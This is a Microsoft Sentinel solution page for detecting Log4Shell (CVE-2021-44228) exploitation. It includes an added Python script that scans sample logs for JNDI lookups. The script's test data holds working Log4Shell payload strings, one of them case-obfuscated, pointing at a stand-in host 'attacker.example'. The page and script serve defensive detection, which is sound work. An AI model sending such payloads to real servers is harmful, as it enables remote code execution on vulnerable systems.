Log4j Vulnerability Detection

Microsoft Sentinel, Microsoft Corporation

This solution monitors for, detects and investigates exploitation of the Log4Shell vulnerability in Apache Log4j.

Note: Please refer to the following before installing the solution:

• Review the solution Release Notes

• There may be known issues pertaining to this solution; please review them before installing.

Microsoft's security research teams have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”. The vulnerability allows unauthenticated remote code execution. It is triggered when a specially crafted string, supplied by the attacker through any of a variety of input vectors, is parsed and processed by the vulnerable Log4j 2 component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog. This solution provides content to monitor, detect and investigate signals related to exploitation of this vulnerability in Microsoft Sentinel.
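The paragraph above describes the trigger (an attacker-controlled string reaching the vulnerable Log4j 2 lookup code) without showing what a detection over ingested logs looks for. The following is an added illustration, not part of this solution or of Microsoft's own analytic rules, which are written in KQL over the connector data listed below. It scans constructed web-server log lines for the Log4j JNDI lookup syntax that Log4Shell exploitation relies on, after collapsing the single-character case lookups commonly used to break naive string matches. The log lines, the hostname attacker.example and the helper names are all constructed for this example.

```python
import re

# Constructed sample access-log lines (not from the page): two benign requests and
# two whose User-Agent carries a Log4j JNDI lookup string of the kind CVE-2021-44228 exploits.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:10:12:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:09 +0000] "GET /api HTTP/1.1" 200 256 "-" "${${lower:j}ndi:rmi://attacker.example/b}"',
    '10.0.0.3 - - [10/Dec/2021:10:12:11 +0000] "POST /search HTTP/1.1" 200 128 "-" "curl/7.79"',
]

# ${lower:x} / ${upper:x} evaluate to the single character x; collapsing them
# before matching is what lets the detector see the plain "jndi" token.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([A-Za-z])\}", re.IGNORECASE)

# The lookup prefix itself, with the optional URI scheme captured for reporting.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z0-9]+)?", re.IGNORECASE)


def normalize(text: str) -> str:
    """Repeatedly collapse nested case lookups until the string stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def detect(lines):
    """Return (line_number, scheme, raw_line) for each line containing a JNDI lookup.

    The scheme is lower-cased, or None when the lookup has no recognisable scheme.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI_LOOKUP.search(normalize(line))
        if match:
            scheme = match.group(1).lower() if match.group(1) else None
            hits.append((number, scheme, line))
    return hits


if __name__ == "__main__":
    for number, scheme, line in detect(SAMPLE_LOGS):
        print(f"line {number}: jndi lookup via {scheme or 'unknown scheme'}: {line}")
```

Running the script reports lines 2 and 3 of the constructed sample; the nested `${lower:j}` variant on line 3 is only caught because `normalize` runs first, which is the same reason production rules match on normalised or decoded fields rather than on the raw `${jndi:` literal alone.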

Prerequisites:

This is a domain solution and does not include any data connectors. Install one or more of the listed solutions, or develop custom ASIM parsers, to unlock the value provided by this solution.

  1. Azure Web Application Firewall (WAF)
  2. Microsoft 365
  3. Windows Server DNS
  4. CiscoASA
  5. PaloAlto-PAN-OS
  6. Microsoft Entra ID
  7. Azure Activity
  8. Amazon Web Services
  9. Azure Firewall
  10. SquidProxy
  11. Zscaler Private Access (ZPA)
  12. Syslog
  13. Check Point
  14. Microsoft Defender XDR

Workbooks: 2, Analytic Rules: 4, Hunting Queries: 10, Watchlists: 1, Playbooks: 2